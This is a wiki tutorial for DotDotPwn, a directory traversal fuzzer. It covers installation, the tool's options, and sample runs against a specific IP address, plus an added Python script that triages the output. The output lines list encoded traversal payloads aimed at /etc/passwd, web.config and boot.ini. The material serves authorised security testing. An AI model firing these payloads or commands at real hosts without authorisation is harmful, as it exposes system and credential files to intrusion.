Dotdotpwn

From aldeid

Description

DotDotPwn is a directory traversal fuzzer written by Christian Navarrete (aka chr1x). It helps identify directory traversal vulnerabilities in various services (HTTP, FTP, TFTP). The fuzzing modules are:

  • HTTP
  • HTTP URL
  • FTP
  • TFTP
  • Payload (Protocol independent)
  • STDOUT

Written in Perl, the application can be installed on *nix and Windows platforms.

For more information on DotDotPwn, refer to the complete documentation here: http://chr1x.sectester.net/dotdotpwn/README.txt.

Installation

Prerequisites

Perl

First, install Perl:

  • Debian, *ubuntu:
$ sudo apt-get install perl
  • OpenSuse:
> sudo yast2 -i perl

Nmap

Nmap is only needed for OS fingerprinting (the -O option).

  • Debian, *ubuntu:
$ sudo apt-get install nmap
  • OpenSuse:
> sudo yast2 -i nmap

Perl modules

DotDotPwn requires the following Perl modules, which can be installed via CPAN:

$ sudo cpan
cpan[1]> install HTTP::Lite
cpan[2]> install Net::FTP
cpan[3]> install TFTP
cpan[4]> install Time::HiRes
cpan[5]> install Socket
cpan[6]> install IO::Socket
cpan[7]> install Getopt::Std
cpan[8]> install Switch

DotDotPwn

$ mkdir -p /data/src/
$ cd /data/src/
$ wget http://chr1x.sectester.net/dotdotpwn/dotdotpwn-v2.1.tar.gz
$ tar xzvf dotdotpwn-v2.1.tar.gz

Usage

Basic usage

$ ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]

Options

-m <module>
Module (http | http-url | ftp | tftp | payload | stdout)
-h <host>
Hostname
-O
Operating System detection for intelligent fuzzing (nmap)
-s
Service version detection (banner grabber)
-d
Depth of traversals (e.g. depth 3 equals ../../../)
default: 6
-f
Specific filename (e.g. /etc/motd)
default: filenames defined in TraversalEngine.pm
-u <url>
URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
-k <string_pattern>
String pattern to match in the response if it's vulnerable (e.g. "root:" if trying with /etc/passwd)
-U <username>
Username
default: 'anonymous'
-P <password>
Password
default: '[email protected]'
-p <file>
Filename with the payload to be sent and the part to be fuzzed marked as TRAVERSAL
-x <port>
Port to connect to
default: HTTP=80, FTP=21, TFTP=69
-t <number>
Time in milliseconds between each test
default: 300 (0.3 seconds)
-b
Break after the first vulnerability is found
-q
Quiet mode (doesn't print each attempt)

HTTP directory traversal test

The command to automate an HTTP directory traversal test is:

$ ./dotdotpwn.pl -m http -h 80.14.163.161

It is recommended that you redirect the results to a text file so they can be analyzed later:

$ ./dotdotpwn.pl -m http -h 80.14.163.161 > http_audit.txt

Here is an extract of the results:

[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cissue
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cconfig.inc.php
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cweb.config
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cissue
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cconfig.inc.php
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cweb.config
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cissue
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cconfig.inc.php
[*] HTTP Status: 404 | Testing Path: http://80.14.163.161:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cweb.config

Each line gives the HTTP status returned for the tested payload (e.g. Status: 404) together with the payload itself (e.g. Traversal String: ..%%32%66..%%32%66..%%32%66..%%32%66boot.ini). A 200 status means the tested site is likely vulnerable and the finding should be verified manually; a 200 on its own is only a hint, since many servers answer 200 for any path, so use -k to match a string expected in the requested file (e.g. "root:" for /etc/passwd) before treating a line as a hit.
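As an added example (not part of this page or of DotDotPwn itself), the following Python script triages an http_audit.txt file: it undoes the encodings seen in the output above (double URL encoding such as %%32%66, and the literal 0x5c/0x2f separator tokens), decides whether the decoded path climbs above the document root, and keeps only the 200 lines whose payload actually does so. The sample lines and the host example.test are constructed; the 200 line is made up to show a hit.

```python
"""Triage DotDotPwn HTTP output: decode payloads, flag 200s that escape the root."""
import re
from urllib.parse import unquote, urlsplit

# Literal tokens DotDotPwn uses in place of the path separators (0x5c as seen above;
# 0x2f assumed as its slash counterpart).
TOKENS = {"0x2f": "/", "0x5c": "\\"}

def canonicalize(path: str, max_rounds: int = 4) -> str:
    """Repeatedly URL-decode and substitute separator tokens, as a lenient server might."""
    s = path
    for _ in range(max_rounds):
        decoded = unquote(s)          # one decoding pass; %%32%66 -> %2f -> /
        for token, sep in TOKENS.items():
            decoded = decoded.replace(token, sep)
        if decoded == s:
            break
        s = decoded
    return s.replace("\\", "/")       # treat backslash as a separator too

def escapes_root(path: str) -> bool:
    """True if the canonical path has more '..' than real segments before it."""
    depth = 0
    for seg in canonicalize(path).split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

LINE_RE = re.compile(r"\[\*\] HTTP Status: (\d+) \| Testing Path: (\S+)")

def parse_line(line: str):
    """Return (status, url path) for one DotDotPwn HTTP output line, or None."""
    m = LINE_RE.search(line)
    return (int(m.group(1)), urlsplit(m.group(2)).path) if m else None

def triage(lines):
    """Keep the raw paths that got a 200 response and really climb above the root."""
    hits = []
    for line in lines:
        parsed = parse_line(line)
        if parsed and parsed[0] == 200 and escapes_root(parsed[1]):
            hits.append(parsed[1])
    return hits

SAMPLE = [  # constructed lines modelled on the extract above; host is a placeholder
    "[*] HTTP Status: 404 | Testing Path: http://example.test:80/%2e%2e0x5c%2e%2e0x5c%2e%2e0x5cetc0x5cpasswd",
    "[*] HTTP Status: 200 | Testing Path: http://example.test:80/..%%32%66..%%32%66..%%32%66boot.ini",
    "[*] HTTP Status: 200 | Testing Path: http://example.test:80/index.php",
]

if __name__ == "__main__":
    for p in triage(SAMPLE):
        print("verify manually:", p, "->", canonicalize(p))
```

Run it as `python3 triage.py < http_audit.txt` after swapping SAMPLE for `sys.stdin`; anything it prints still needs the manual check or a -k match described above.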


FTP directory traversal test

$ ./dotdotpwn.pl -m ftp -h 80.14.163.161
